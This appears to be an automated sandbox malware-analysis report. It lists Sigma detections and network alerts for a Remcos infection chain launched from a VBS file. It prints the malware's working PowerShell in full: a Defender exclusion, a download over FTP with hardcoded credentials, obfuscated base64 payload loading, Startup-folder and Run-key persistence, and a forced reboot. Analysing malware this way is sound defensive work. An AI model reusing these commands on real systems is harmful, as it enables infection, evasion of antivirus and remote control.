                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 4924, ProcessName: powershell.exe
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Sigma detected: Suspicious Powershell In Registry Run Keys
                    Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_vuw
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", ProcessId: 1492, ProcessName: wscript.exe
                    Sigma detected: Local Accounts Discovery
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", ProcessId: 6444, ProcessName: cmd.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6764, TargetFilename: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Copy file to startup via Powershell
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 86 21 33 9B 08 AF 9C 3A 80 D7 7E 18 79 E0 DB CA 76 7A 40 1E AD 35 7C F9 A4 1C A4 CD 85 A6 DA BF E8 A9 DC 20 86 6A 86 38 07 10 F9 7D C0 FF 09 6B F4 79 61 18 65 8C 2A EE 6D DB 58 32 FB 41 96 25 B0 17 1E D2 4C FD 5F 8D 65 F1 EC CD 0C CB 30 AA 91 6C FA 4B 0E 54 73 17 15 D3 A8 8E 98 2E B6 CB 64 09 9E CA 8E A8 F3 66 72 B1 7D C4 C5 5B DA 97 6D 36 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-52K54M\exepath

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:28:19.798901+020020204231Exploit Kit Activity Detected173.231.247.100443192.168.2.649719TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:28:19.798901+020020204251Exploit Kit Activity Detected173.231.247.100443192.168.2.649719TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:28:24.687917+020020327761Malware Command and Control Activity Detected192.168.2.649725212.162.149.1632404TCP
                    2024-10-03T09:28:27.202095+020020327761Malware Command and Control Activity Detected192.168.2.649726212.162.149.1632404TCP
                    2024-10-03T09:28:29.719551+020020327761Malware Command and Control Activity Detected192.168.2.649729212.162.149.1632404TCP
                    2024-10-03T09:28:32.237386+020020327761Malware Command and Control Activity Detected192.168.2.649730212.162.149.1632404TCP
                    2024-10-03T09:28:34.741502+020020327761Malware Command and Control Activity Detected192.168.2.649731212.162.149.1632404TCP
